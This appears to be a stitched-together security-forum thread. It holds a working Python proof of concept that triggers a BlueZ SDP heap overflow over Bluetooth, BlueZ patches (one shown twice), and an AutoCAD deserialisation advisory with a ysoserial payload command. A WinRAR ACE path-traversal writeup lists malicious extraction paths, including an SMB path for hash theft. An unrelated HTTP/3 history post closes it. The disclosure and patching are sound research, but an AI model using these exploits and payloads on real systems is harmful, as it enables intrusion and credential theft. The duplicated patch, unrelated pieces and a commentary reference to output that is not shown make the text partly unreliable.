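The `0x55aa` prefix is specific to this capture; on another run (or another target) the upper bits would differ, so in practice you would derive the prefix from a known leaked pointer first.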
Heap overflow poc:

from pwn import *
import bluetooth

if not 'TARGET' in args:
    log.info("Usage: sdp_heapoverflow_poc.py TARGET=XX:XX:XX:XX:XX:XX")
    exit()

# the service from which we want to request attributes (GAP)
SERVICE_REC_HANDLE = 0x00010001

target = args['TARGET']
mtu = 65535
attrcount = 1000 # how often to request the attribute

context.endian = 'big'

def sdppacket(handle, attr):
    pkt = ""
    pkt += p32(handle) # handle
    pkt += p16(0xFFFF) # max_rsp_size

    # contains an attribute sequence with the length describing the attributes being 16 bit long
    # see extract_des function in line 113 of src/sdpd-request.c
    pkt += p8(0x36) # DTD (seq_type SDP_SEQ16)
    pkt += p16(len(attr)) # seq size, 16 bit according to DTD

    # attributes
    pkt += attr

    pkt += p8(0x00) # Cstate len

    pduhdr = ""
    pduhdr += p8(0x04) # pdu_id 0x04 -> SVC_ATTR_REQ
    pduhdr += p16(0x0000) # tid
    pduhdr += p16(len(pkt)) # plen

    return pduhdr + pkt

if __name__ == '__main__':
    log.info('Creating L2CAP socket')
    sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bluetooth.set_l2cap_mtu(sock, mtu)

    log.info('Connecting to target')
    sock.connect((target, 1))

    # the attribute we want to request (multiple times)
    # to create the largest response possible, we request a
    # range of attributes at once.
    # for more control during exploitation, it would also be possible to request
    # single attributes.
    attr = p8(0x0A) # data type (SDP_UINT_32)
    attr += p16(0x0000) # attribute id start
    attr += p16(0xFFFE) # attribute id end

    sdp = sdppacket(SERVICE_REC_HANDLE, attr*attrcount)

    log.info("packet length: %d bytes" % len(sdp))

    log.info('Triggering heap overflow...')
    sock.send(sdp)
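As a sanity check on the PoC above: each requested attribute range is 5 bytes (one DTD byte plus two 16-bit attribute IDs) and is repeated 1000 times; adding the SDP body fields and the 5-byte PDU header lands exactly on the length the script logs. A quick back-of-the-envelope sketch (my own, mirroring the p8/p16/p32 fields of the PoC):

```python
attrcount = 1000
attr_len = 1 + 2 + 2                # p8 DTD + p16 attr id start + p16 attr id end
body = 4 + 2 + 1 + 2 + attr_len * attrcount + 1
                                    # handle + max_rsp_size + seq DTD + seq size
                                    # + attributes + cstate len
pdu = 1 + 2 + 2 + body              # pdu_id + tid + plen header + body
print(pdu)                          # 5015, matching the PoC's log line
```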
If everything happens as expected, we should see output similar to this:

[*] Creating L2CAP socket
[*] Connecting to target
[*] packet length: 5015 bytes
[*] Triggering heap overflow...

Patches suggested by Luiz Augusto von Dentz

SDP Info leak patch:

From 00d8409234302e5e372af9b4cc299b55faecb0a4 Mon Sep 17 00:00:00 2001
From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
Date: Fri, 28 Sep 2018 15:04:42 +0300
Subject: [PATCH BlueZ 1/2] sdp: Fix not checking if cstate length
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

cstate length should be smaller than cached length otherwise the
request shall be considered invalid as the data is not within the
cached buffer.

An independent security researcher, Julian Rauchberger, has reported
this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure
program.
---
 src/sdpd-request.c | 74 ++++++++++++++++++++++++----------------------
 1 file changed, 39 insertions(+), 35 deletions(-)

diff --git a/src/sdpd-request.c b/src/sdpd-request.c
index 318d04467..deaed266f 100644
--- a/src/sdpd-request.c
+++ b/src/sdpd-request.c
@@ -70,9 +70,16 @@ static sdp_buf_t *sdp_get_cached_rsp(sdp_cont_state_t *cstate)
 {
 	sdp_cstate_list_t *p;

-	for (p = cstates; p; p = p->next)
-		if (p->timestamp == cstate->timestamp)
+	for (p = cstates; p; p = p->next) {
+		/* Check timestamp */
+		if (p->timestamp != cstate->timestamp)
+			continue;
+
+		/* Check if requesting more than available */
+		if (cstate->cStateValue.maxBytesSent < p->buf.data_size)
 			return &p->buf;
+	}
+
 	return 0;
 }

@@ -624,6 +631,31 @@ static int extract_attrs(sdp_record_t *rec, sdp_list_t *seq, sdp_buf_t *buf)
 	return 0;
 }

+/* Build cstate response */
+static int sdp_cstate_rsp(sdp_cont_state_t *cstate, sdp_buf_t *buf,
+							uint16_t max)
+{
+	/* continuation State exists -> get from cache */
+	sdp_buf_t *cache = sdp_get_cached_rsp(cstate);
+	uint16_t sent;
+
+	if (!cache)
+		return 0;
+
+	sent = MIN(max, cache->data_size - cstate->cStateValue.maxBytesSent);
+	memcpy(buf->data, cache->data + cstate->cStateValue.maxBytesSent, sent);
+	buf->data_size += sent;
+	cstate->cStateValue.maxBytesSent += sent;
+
+	SDPDBG("Response size : %d sending now : %d bytes sent so far : %d",
+		cache->data_size, sent, cstate->cStateValue.maxBytesSent);
+
+	if (cstate->cStateValue.maxBytesSent == cache->data_size)
+		return sdp_set_cstate_pdu(buf, NULL);
+
+	return sdp_set_cstate_pdu(buf, cstate);
+}
+
 /*
  * A request for the attributes of a service record.
  * First check if the service record (specified by
@@ -633,7 +665,6 @@ static int extract_attrs(sdp_record_t *rec, sdp_list_t *seq, sdp_buf_t *buf)
 static int service_attr_req(sdp_req_t *req, sdp_buf_t *buf)
 {
 	sdp_cont_state_t *cstate = NULL;
-	uint8_t *pResponse = NULL;
 	short cstate_size = 0;
 	sdp_list_t *seq = NULL;
 	uint8_t dtd = 0;
@@ -719,24 +750,8 @@ static int service_attr_req(sdp_req_t *req, sdp_buf_t *buf)
 	buf->buf_size -= sizeof(uint16_t);

 	if (cstate) {
-		sdp_buf_t *pCache = sdp_get_cached_rsp(cstate);
-
-		SDPDBG("Obtained cached rsp : %p", pCache);
-
-		if (pCache) {
-			short sent = MIN(max_rsp_size, pCache->data_size - cstate->cStateValue.maxBytesSent);
-			pResponse = pCache->data;
-			memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent);
-			buf->data_size += sent;
-			cstate->cStateValue.maxBytesSent += sent;
-
-			SDPDBG("Response size : %d sending now : %d bytes sent so far : %d",
-				pCache->data_size, sent, cstate->cStateValue.maxBytesSent);
-			if (cstate->cStateValue.maxBytesSent == pCache->data_size)
-				cstate_size = sdp_set_cstate_pdu(buf, NULL);
-			else
-				cstate_size = sdp_set_cstate_pdu(buf, cstate);
-		} else {
+		cstate_size = sdp_cstate_rsp(cstate, buf, max_rsp_size);
+		if (!cstate_size) {
 			status = SDP_INVALID_CSTATE;
 			error("NULL cache buffer and non-NULL continuation state");
 		}
@@ -786,7 +801,7 @@ done:
 static int service_search_attr_req(sdp_req_t *req, sdp_buf_t *buf)
 {
 	int status = 0, plen, totscanned;
-	uint8_t *pdata, *pResponse = NULL;
+	uint8_t *pdata;
 	unsigned int max;
 	int scanned, rsp_count = 0;
 	sdp_list_t *pattern = NULL, *seq = NULL, *svcList;
@@ -915,19 +930,8 @@ static int service_search_attr_req(sdp_req_t *req, sdp_buf_t *buf)
 		} else
 			cstate_size = sdp_set_cstate_pdu(buf, NULL);
 	} else {
-		/* continuation State exists -> get from cache */
-		sdp_buf_t *pCache = sdp_get_cached_rsp(cstate);
-		if (pCache && cstate->cStateValue.maxBytesSent < pCache->data_size) {
-			uint16_t sent = MIN(max, pCache->data_size - cstate->cStateValue.maxBytesSent);
-			pResponse = pCache->data;
-			memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent);
-			buf->data_size += sent;
-			cstate->cStateValue.maxBytesSent += sent;
-			if (cstate->cStateValue.maxBytesSent == pCache->data_size)
-				cstate_size = sdp_set_cstate_pdu(buf, NULL);
-			else
-				cstate_size = sdp_set_cstate_pdu(buf, cstate);
-		} else {
+		cstate_size = sdp_cstate_rsp(cstate, buf, max);
+		if (!cstate_size) {
 			status = SDP_INVALID_CSTATE;
 			SDPDBG("Non-null continuation state, but null cache buffer");
 		}
-- 
2.17.1
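The key line in the fix above is the new `cstate->cStateValue.maxBytesSent < p->buf.data_size` check in sdp_get_cached_rsp(). In the unpatched service_attr_req() path, an attacker-supplied continuation offset larger than the cached response size makes the unsigned subtraction wrap around; MIN() then clamps to the attacker-controlled max_rsp_size, and the subsequent memcpy() reads far past the cached buffer. A small Python model of that arithmetic (my own sketch, with made-up sizes; the C types are simplified here):

```python
MAX_U32 = 0xFFFFFFFF

def unpatched_sent(data_size, max_bytes_sent, max_rsp_size=0xFFFF):
    """Mimic the unpatched length computation in service_attr_req():
    sent = MIN(max_rsp_size, data_size - maxBytesSent), with the
    subtraction behaving like C unsigned arithmetic (wraps on underflow)."""
    remaining = (data_size - max_bytes_sent) & MAX_U32
    return min(max_rsp_size, remaining)

# A hypothetical 96-byte cached response, but an attacker-chosen cstate
# offset of 101 (the infoleak PoC output above shows offset=101): the
# subtraction wraps, MIN() picks max_rsp_size, and the server would
# memcpy() 65535 bytes starting past the end of its cache.
print(unpatched_sent(96, 101))    # 65535

# With a sane offset the computation behaves: only the remainder is sent.
print(unpatched_sent(200, 101))   # 99
```

The patched code rejects the continuation state outright in this situation, which is why the cache lookup now returns NULL for out-of-range offsets.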
---
 src/sdpd-request.c | 74 ++++++++++++++++++++++++----------------------
 1 file changed, 39 insertions(+), 35 deletions(-)

diff --git a/src/sdpd-request.c b/src/sdpd-request.c
index 318d04467..deaed266f 100644
--- a/src/sdpd-request.c
+++ b/src/sdpd-request.c
@@ -70,9 +70,16 @@ static sdp_buf_t *sdp_get_cached_rsp(sdp_cont_state_t *cstate)
 {
 	sdp_cstate_list_t *p;
 
-	for (p = cstates; p; p = p->next)
-		if (p->timestamp == cstate->timestamp)
+	for (p = cstates; p; p = p->next) {
+		/* Check timestamp */
+		if (p->timestamp != cstate->timestamp)
+			continue;
+
+		/* Check if requesting more than available */
+		if (cstate->cStateValue.maxBytesSent < p->buf.data_size)
 			return &p->buf;
+	}
+
 	return 0;
 }
 
@@ -624,6 +631,31 @@ static int extract_attrs(sdp_record_t *rec, sdp_list_t *seq, sdp_buf_t *buf)
 	return 0;
 }
 
+/* Build cstate response */
+static int sdp_cstate_rsp(sdp_cont_state_t *cstate, sdp_buf_t *buf,
+							uint16_t max)
+{
+	/* continuation State exists -> get from cache */
+	sdp_buf_t *cache = sdp_get_cached_rsp(cstate);
+	uint16_t sent;
+
+	if (!cache)
+		return 0;
+
+	sent = MIN(max, cache->data_size - cstate->cStateValue.maxBytesSent);
+	memcpy(buf->data, cache->data + cstate->cStateValue.maxBytesSent, sent);
+	buf->data_size += sent;
+	cstate->cStateValue.maxBytesSent += sent;
+
+	SDPDBG("Response size : %d sending now : %d bytes sent so far : %d",
+		cache->data_size, sent, cstate->cStateValue.maxBytesSent);
+
+	if (cstate->cStateValue.maxBytesSent == cache->data_size)
+		return sdp_set_cstate_pdu(buf, NULL);
+
+	return sdp_set_cstate_pdu(buf, cstate);
+}
+
 /*
  * A request for the attributes of a service record.
  * First check if the service record (specified by
@@ -633,7 +665,6 @@ static int extract_attrs(sdp_record_t *rec, sdp_list_t *seq, sdp_buf_t *buf)
 static int service_attr_req(sdp_req_t *req, sdp_buf_t *buf)
 {
 	sdp_cont_state_t *cstate = NULL;
-	uint8_t *pResponse = NULL;
 	short cstate_size = 0;
 	sdp_list_t *seq = NULL;
 	uint8_t dtd = 0;
@@ -719,24 +750,8 @@ static int service_attr_req(sdp_req_t *req, sdp_buf_t *buf)
 	buf->buf_size -= sizeof(uint16_t);
 
 	if (cstate) {
-		sdp_buf_t *pCache = sdp_get_cached_rsp(cstate);
-
-		SDPDBG("Obtained cached rsp : %p", pCache);
-
-		if (pCache) {
-			short sent = MIN(max_rsp_size, pCache->data_size - cstate->cStateValue.maxBytesSent);
-			pResponse = pCache->data;
-			memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent);
-			buf->data_size += sent;
-			cstate->cStateValue.maxBytesSent += sent;
-
-			SDPDBG("Response size : %d sending now : %d bytes sent so far : %d",
-				pCache->data_size, sent, cstate->cStateValue.maxBytesSent);
-			if (cstate->cStateValue.maxBytesSent == pCache->data_size)
-				cstate_size = sdp_set_cstate_pdu(buf, NULL);
-			else
-				cstate_size = sdp_set_cstate_pdu(buf, cstate);
-		} else {
+		cstate_size = sdp_cstate_rsp(cstate, buf, max_rsp_size);
+		if (!cstate_size) {
 			status = SDP_INVALID_CSTATE;
 			error("NULL cache buffer and non-NULL continuation state");
 		}
@@ -786,7 +801,7 @@ done:
 static int service_search_attr_req(sdp_req_t *req, sdp_buf_t *buf)
 {
 	int status = 0, plen, totscanned;
-	uint8_t *pdata, *pResponse = NULL;
+	uint8_t *pdata;
 	unsigned int max;
 	int scanned, rsp_count = 0;
 	sdp_list_t *pattern = NULL, *seq = NULL, *svcList;
@@ -915,19 +930,8 @@ static int service_search_attr_req(sdp_req_t *req, sdp_buf_t *buf)
 		} else
 			cstate_size = sdp_set_cstate_pdu(buf, NULL);
 	} else {
-		/* continuation State exists -> get from cache */
-		sdp_buf_t *pCache = sdp_get_cached_rsp(cstate);
-		if (pCache && cstate->cStateValue.maxBytesSent < pCache->data_size) {
-			uint16_t sent = MIN(max, pCache->data_size -
-						cstate->cStateValue.maxBytesSent);
-			pResponse = pCache->data;
-			memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent);
-			buf->data_size += sent;
-			cstate->cStateValue.maxBytesSent += sent;
-			if (cstate->cStateValue.maxBytesSent == pCache->data_size)
-				cstate_size = sdp_set_cstate_pdu(buf, NULL);
-			else
-				cstate_size = sdp_set_cstate_pdu(buf, cstate);
-		} else {
+		cstate_size = sdp_cstate_rsp(cstate, buf, max);
+		if (!cstate_size) {
 			status = SDP_INVALID_CSTATE;
 			SDPDBG("Non-null continuation state, but null cache buffer");
 		}
--
2.17.1

SDP Heap Overflow patch:

From 6632f256515ed4bd603a8ccb3b8bdd84fd5cc181 Mon Sep 17 00:00:00 2001
From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
Date: Fri, 28 Sep 2018 16:08:32 +0300
Subject: [PATCH BlueZ 2/2] sdp: Fix buffer overflow
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

sdp_append_buf shall check if there is enough space to store the data before copying it.

An independent security researcher, Julian Rauchberger, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
---
 lib/sdp.c | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/lib/sdp.c b/lib/sdp.c
index eb408a948..84311eda1 100644
--- a/lib/sdp.c
+++ b/lib/sdp.c
@@ -2834,6 +2834,12 @@ void sdp_append_to_buf(sdp_buf_t *dst, uint8_t *data, uint32_t len)
 	SDPDBG("Append src size: %d", len);
 	SDPDBG("Append dst size: %d", dst->data_size);
 	SDPDBG("Dst buffer size: %d", dst->buf_size);
+
+	if (dst->data_size + len > dst->buf_size) {
+		SDPERR("Cannot append");
+		return;
+	}
+
 	if (dst->data_size == 0 && dtd == 0) {
 		/* create initial sequence */
 		*p = SDP_SEQ8;
--
2.17.1

Sursa: https://ssd-disclosure.com/index.php/archives/3743
  11. AutoCad .NET Deserialisation Vulnerability

Product: AutoCad
Severity: Medium
CVE Reference: CVE-2019-7361
Type: Code Execution

Description

The Action Macro functionality of AutoDesk’s AutoCad software suite is vulnerable to code execution due to improper validation of user input passed to a deserialization call.

AutoCad provides the ability to automate a set of tasks by recording the user performing those tasks and replaying them later. This functionality is called Action Macros. Before playing an Action Macro, the list of actions performed is presented to the user, as shown in the next figure. This recording will create a number of “DONUT” objects within the current drawing.

Once an Action Macro has been recorded, it is saved to the user’s “Actions” directory as a .actm file. A snippet of the underlying data of the Action Macro file for the above recording is shown below:

This data is made up of a number of .NET serialized objects. Highlighted in red is the length of the first object (of type AutoDesk.AutoCad.MacroRecorder.MacroNode). The green outline highlights the actual object, and the blue is the beginning of the next object. It should be noted that this data is deserialized to allow the user to view the tree of actions within a recording prior to the user clicking “play”.

The vulnerability ultimately lies in AcMR.dll, specifically the method AutoDesk.AutoCad.MacroRecorder.BaseNode.Load:

public static INode Load(Stream stream)
{
    if (!DebugUtil.Verify(stream != null))
        return (INode) null;
    object obj = MacroManager.Formatter.Deserialize(stream);   // (2)
    if (DebugUtil.Verify(obj is INode))                        // (3)
        return obj as INode;
    return (INode) null;
}

public void Save(Stream stream)
{
    if (!DebugUtil.Verify(stream != null))
        return;
    MacroManager.Formatter.Serialize(stream, (object) this);   // (1)
}

At (1) the object is saved using MacroManager.Formatter’s Serialize method – this occurs when an Action Macro is saved.
At (2), the user input stream is deserialized prior to being checked as a valid INode object at (3). These actions occur when the Action Macro is loaded into memory.

The MacroManager.Formatter.Deserialize method is a wrapper around the .NET BinaryFormatter class:

public static IFormatter Formatter
{
    get
    {
        if (MacroManager.m_formatter == null)
        {
            MacroManager.m_formatter = (IFormatter) new BinaryFormatter();
            MacroManager.m_formatter.Binder = (SerializationBinder) new MacroManager.TypeRedirectionBinder();
        }
        return MacroManager.m_formatter;
    }
}

A malicious user is able to gain code execution by replacing legitimate serialized objects in an Action Macro file. As a proof of concept, the ysoserial.net tool was used to generate a series of .NET gadgets that, when deserialized, would cause a calculator to be opened. The command used for this proof of concept was:

ysoserial.exe -o raw -g TypeConfuseDelegate -c "calc.exe" -f BinaryFormatter > poc_calc_action_macro.actm

Code execution occurs when a user attempts to view the actions within an Action Macro, which happens directly prior to replaying it, as demonstrated in the next figure. Note that the Action Macro is never “played”.

Impact

This vulnerability is of medium risk to end users. Code execution occurs in the context of the current user; no extra privileges are gained. The potential attack vector could be through phishing of end users, whereby they are coerced into playing malicious Action Macros believing them to be legitimate. The most likely scenario could involve a malicious actor sharing an Action Macro file online that supposedly solves a community problem.

Solution

As of February 1st 2019, AutoDesk have released a patch mitigating this vulnerability. Users are advised to update AutoCad to the most recent version available. AutoDesk have also produced the following advisory pertaining to this vulnerability as well as a number of others [2].
References

[1] ysoserial.net - https://github.com/pwntester/ysoserial.net/tree/master/ysoserial
[2] AutoDesk Advisory - https://www.autodesk.com/trust/security-advisories/adsk-sa-2019-0001

Sursa: https://labs.mwrinfosecurity.com/advisories/autocad-net-deserialisation-vulnerability/
  12. Investigating WinRAR Code Execution Vulnerability (CVE-2018-20250) at Internet Scale

Author: admin
Posted on: February 22, 2019
Categories: Papers
Authors: lywang, dannywei

0x00 Background

As one of the most popular archiving tools, WinRAR supports compression and decompression of multiple archive formats. Check Point security researcher Nadav Grossman recently disclosed a series of security vulnerabilities he found in WinRAR, the most powerful one being a remote code execution vulnerability in the ACE archive decompression module (CVE-2018-20250). To support decompression of ACE archives, WinRAR integrated a 19-year-old dynamic link library, unacev2.dll, which has not been updated since 2006 and does not enable any kind of exploit mitigation technology. Nadav Grossman uncovered a directory traversal bug in unacev2.dll, which could allow an attacker to execute arbitrary code or leak Net-NTLM hashes.

0x01 Description

The ACE archive decompression module unacev2.dll fails to properly filter relative paths when validating the target path. An attacker can trick the program into directly using a relative path as the target path. By placing a malicious executable in the system startup folder, this can lead to arbitrary code execution.

0x02 Root Cause

unacev2.dll validates the destination path before extracting files from ACE archives. It reads file_relative_path from the archive file and uses GetDevicePathLen(file_relative_path) to validate the path.
The path concatenation is performed according to the return value of the function, as shown in the following diagram: (Source: https://research.checkpoint.com/extracting-code-execution-from-winrar/)

When GetDevicePathLen(file_relative_path) returns 0, it concatenates the target path with the relative path from the archive to form the final path:

sprintf(final_file_path, "%s%s", destination_folder, file_relative_path);

Otherwise, it directly uses the relative path as the final path:

sprintf(final_file_path, "%s%s", "", file_relative_path);

If an attacker can craft a malicious relative path that bypasses multiple filter and validation functions such as StateCallbackProc() and unacev2.dll!CleanPath(), and makes unacev2.dll!GetDevicePathLen(file_relative_path) return a non-zero value, the malicious relative path will be used as the final path for decompression. Nadav Grossman successfully crafted two such paths:

#  Malicious Path                                               Final Path
1  C:\C:\some_folder\some_file.ext                              C:\some_folder\some_file.ext
2  C:\\10.10.10.10\smb_folder_name\some_folder\some_file.ext    \\10.10.10.10\smb_folder_name\some_folder\some_file.ext

Variation 1: The attacker can place a file at an arbitrary path on the victim’s computer.
Variation 2: The attacker can steal the victim’s Net-NTLM hash, and can then perform an NTLM relay attack to execute code on the victim’s computer.

It is worth mentioning that WinRAR runs at normal user privilege. Therefore, an attacker cannot place a file in the common startup folder (“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”). Placing a file in the user startup folder (“C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”) requires guessing or brute-forcing a valid user name. However, in the most common scenarios, where victims download an archive file to the Desktop (C:\Users\<user name>\Desktop) or Downloads (C:\Users\<user name>\Downloads) folder and then extract it in place, the working directory of WinRAR is the same as that of the archive file.
By using directory traversal, an attacker can release the payload to the Startup folder without guessing a user name. Nadav Grossman crafted the following path to build a remote code execution exploit:

"C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"

0x03 Affected Software

As a shared library, unacev2.dll is also used by other software that supports ACE file decompression. Such software is also affected by this vulnerability. Our Project A’Tuin system scans software at internet scale. We scanned through all software that uses this shared library. The following diagram shows the version distribution of the library:

Project A’Tuin can also trace shared libraries back to their dependent software. We currently observe that 15 Chinese and 24 non-Chinese software products are affected. Most of them can be categorized as utility software. Among them there are at least 9 file archivers and 8 file explorers/commanders. Many other products seem to simply include the unacev2.dll module as part of the WinRAR package, for their own file decompression needs.

0x04 Mitigations

WinRAR released version 5.70 Beta 1 to patch this vulnerability. Since the vendor of unacev2.dll went out of business in August 2017 and it is a closed-source product, WinRAR decided to remove the ACE decompression feature from WinRAR entirely. 360Zip has also patched this vulnerability by removing unacev2.dll. For users of other affected products, we suggest contacting the vendor for updated versions. If no updated version is available, users can temporarily work around this vulnerability by removing unacev2.dll from the installation directory.
0x05 References

[1] Extracting a 19 Year Old Code Execution from WinRAR
https://research.checkpoint.com/extracting-code-execution-from-winrar/

[2] ACE (compressed file format)
https://en.wikipedia.org/wiki/ACE_(compressed_file_format)

Sursa: https://xlab.tencent.com/en/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/
  13. HTTP/3: From root to tip

24 Jan 2019 by Lucas Pardue.

HTTP is the application protocol that powers the Web. It began life as the so-called HTTP/0.9 protocol in 1991, and by 1999 had evolved to HTTP/1.1, which was standardised within the IETF (Internet Engineering Task Force). HTTP/1.1 was good enough for a long time but the ever-changing needs of the Web called for a better-suited protocol, and HTTP/2 emerged in 2015. More recently it was announced that the IETF is intending to deliver a new version - HTTP/3. To some people this is a surprise and has caused a bit of confusion. If you don't track IETF work closely it might seem that HTTP/3 has come out of the blue. However, we can trace its origins through a lineage of experiments and evolution of Web protocols; specifically the QUIC transport protocol.

If you're not familiar with QUIC, my colleagues have done a great job of tackling different angles. John's blog describes some of the real-world annoyances of today's HTTP, Alessandro's blog tackles the nitty-gritty transport layer details, and Nick's blog covers how to get hands on with some testing. We've collected these and more at https://cloudflare-quic.com. And if that tickles your fancy, be sure to check out quiche, our own open-source implementation of the QUIC protocol written in Rust.

HTTP/3 is the HTTP application mapping to the QUIC transport layer. This name was made official in the recent draft version 17 (draft-ietf-quic-http-17), which was proposed in late October 2018, with discussion and rough consensus being formed during the IETF 103 meeting in Bangkok in November. HTTP/3 was previously known as HTTP over QUIC, which itself was previously known as HTTP/2 over QUIC. Before that we had HTTP/2 over gQUIC, and way back we had SPDY over gQUIC. The fact of the matter, however, is that HTTP/3 is just a new HTTP syntax that works on IETF QUIC, a UDP-based multiplexed and secure transport.
In this blog post we'll explore the history behind some of HTTP/3's previous names and present the motivation behind the most recent name change. We'll go back to the early days of HTTP and touch on all the good work that has happened along the way. If you're keen to get the full picture you can jump to the end of the article or open this highly detailed SVG version.

An HTTP/3 layer cake

Setting the scene

Just before we focus on HTTP, it is worth reminding ourselves that there are two protocols that share the name QUIC. As we explained previously, gQUIC is commonly used to identify Google QUIC (the original protocol), and QUIC is commonly used to represent the IETF standard-in-progress version that diverges from gQUIC.

Since its early days in the 90s, the web’s needs have changed. We've had new versions of HTTP and added user security in the shape of Transport Layer Security (TLS). We'll only touch on TLS in this post; our other blog posts are a great resource if you want to explore that area in more detail.

To help me explain the history of HTTP and TLS, I started to collate details of protocol specifications and dates. This information is usually presented in a textual form such as a list of bullet points stating document titles, ordered by date. However, there are branching standards, each overlapping in time, and a simple list cannot express the real complexity of relationships. In HTTP, there has been parallel work that refactors core protocol definitions for easier consumption, extends the protocol for new uses, and redefines how the protocol exchanges data over the Internet for performance. When you're trying to join the dots over nearly 30 years of Internet history across different branching work streams you need a visualisation. So I made one - the Cloudflare Secure Web Timeline. (NB: Technically it is a cladogram, but the term timeline is more widely known.)
I have applied some artistic license when creating this, choosing to focus on the successful branches in the IETF space. Some of the things not shown include efforts in the W3 Consortium HTTP-NG working group, along with some exotic ideas whose authors are keen on explaining how to pronounce them: HMURR (pronounced 'hammer') and WAKA (pronounced “wah-kah”).

In the next few sections I'll walk this timeline to explain critical chapters in the history of HTTP. To enjoy the takeaways from this post, it helps to have an appreciation of why standardisation is beneficial, and how the IETF approaches it. Therefore we'll start with a very brief overview of that topic before returning to the timeline itself. Feel free to skip the next section if you are already familiar with the IETF.

Types of Internet standard

Generally, standards define common terms of reference, scope, constraint, applicability, and other considerations. Standards exist in many shapes and sizes, and can be informal (aka de facto) or formal (agreed/published by a Standards Defining Organisation such as IETF, ISO or MPEG). Standards are used in many fields; there is even a formal British Standard for making tea - BS 6008.

The early Web used HTTP and SSL protocol definitions that were published outside the IETF; these are marked as red lines on the Secure Web Timeline. The uptake of these protocols by clients and servers made them de facto standards. At some point, it was decided to formalise these protocols (some motivating reasons are described in a later section).

Internet standards are commonly defined in the IETF, which is guided by the informal principle of "rough consensus and running code". This is grounded in experience of developing and deploying things on the Internet. This is in contrast to a "clean room" approach of trying to develop perfect protocols in a vacuum. IETF Internet standards are commonly known as RFCs.
This is a complex area to explain, so I recommend reading the blog post "How to Read an RFC" by the QUIC Working Group Co-chair Mark Nottingham.

A Working Group, or WG, is more or less just a mailing list. Each year the IETF holds three meetings that provide the time and facilities for all WGs to meet in person if they wish. The agenda for these weeks can become very congested, with limited time available to discuss highly technical areas in depth. To overcome this, some WGs choose to also hold interim meetings in the months between the general IETF meetings. This can help to maintain momentum on specification development. The QUIC WG has held several interim meetings since 2017; a full list is available on their meeting page.

These IETF meetings also provide the opportunity for other IETF-related collections of people to meet, such as the Internet Architecture Board or Internet Research Task Force. In recent years, an IETF Hackathon has been held during the weekend preceding the IETF meeting. This provides an opportunity for the community to develop running code and, importantly, to carry out interoperability testing in the same room with others. This helps to find issues in specifications that can be discussed in the following days.

For the purposes of this blog, the important thing to understand is that RFCs don't just spring into existence. Instead, they go through a process that usually starts with an IETF Internet Draft (I-D) that is submitted for consideration of adoption. In the case where there is already a published specification, preparation of an I-D might just be a simple reformatting exercise. I-Ds have a 6-month active lifetime from the date of publication. To keep them active, new versions need to be published. In practice, there is not much consequence to letting an I-D elapse, and it happens quite often. The documents continue to be hosted on the IETF documents website for anyone that wants to read them.
I-Ds are represented on the Secure Web Timeline as purple lines. Each one has a unique name that takes the form of draft-{author name}-{working group}-{topic}-{version}. The working group field is optional; it might predict the IETF WG that will work on the piece, and sometimes this changes. If an I-D is adopted by the IETF, or if the I-D was initiated directly within the IETF, the name is draft-ietf-{working group}-{topic}-{version}. I-Ds may branch, merge or die on the vine. The version starts at 00 and increases by 1 each time a new draft is released. For example, the 4th draft of an I-D will have the version 03. Any time that an I-D changes name, its version resets back to 00.

It is important to note that anyone can submit an I-D to the IETF; you should not consider these as standards. But, if the IETF standardisation process of an I-D does reach consensus, and the final document passes review, we finally get an RFC. The name changes again at this stage. Each RFC gets a unique number, e.g. RFC 7230. These are represented as blue lines on the Secure Web Timeline.

RFCs are immutable documents. This means that changes to the RFC require a completely new number. Changes might be done in order to incorporate fixes for errata (editorial or technical errors that were found and reported) or simply to refactor the specification to improve layout. RFCs may obsolete older versions (complete replacement), or just update them (substantively change).

All IETF documents are openly available on http://tools.ietf.org. Personally I find the IETF Datatracker a little more user friendly because it provides a visualisation of a document's progress from I-D to RFC. Below is an example that shows the development of RFC 1945 - HTTP/1.0, and it is a clear source of inspiration for the Secure Web Timeline.

IETF Datatracker view of RFC 1945

Interestingly, in the course of my work I found that the above visualisation is incorrect. It is missing draft-ietf-http-v10-spec-05 for some reason.
Since the I-D lifetime is 6 months, there appears to be a gap before it became an RFC, whereas in reality draft 05 was still active through until August 1996.

Exploring the Secure Web Timeline

With a small appreciation of how Internet standards documents come to fruition, we can start to walk the Secure Web Timeline. In this section are a number of excerpt diagrams that show an important part of the timeline. Each dot represents the date that a document or capability was made available. For IETF documents, draft numbers are omitted for clarity. However, if you want to see all that detail please check out the complete timeline.

HTTP began life as the so-called HTTP/0.9 protocol in 1991, and in 1994 the I-D draft-fielding-http-spec-00 was published. This was adopted by the IETF soon after, causing the name change to draft-ietf-http-v10-spec-00. The I-D went through 6 draft versions before being published as RFC 1945 - HTTP/1.0 in 1996.

However, even before the HTTP/1.0 work completed, a separate activity started on HTTP/1.1. The I-D draft-ietf-http-v11-spec-00 was published in November 1995 and was formally published as RFC 2068 in 1997. The keen-eyed will spot that the Secure Web Timeline doesn't quite capture that sequence of events; this is an unfortunate side effect of the tooling used to generate the visualisation. I tried to minimise such problems where possible.

An HTTP/1.1 revision exercise was started in mid-1997 in the form of draft-ietf-http-v11-spec-rev-00. This completed in 1999 with the publication of RFC 2616. Things went quiet in the IETF HTTP world until 2007. We'll come back to that shortly.

A History of SSL and TLS

Switching tracks to SSL. We see that the SSL 2.0 specification was released sometime around 1995, and that SSL 3.0 was released in November 1996. Interestingly, SSL 3.0 is described by RFC 6101, which was released in August 2011.
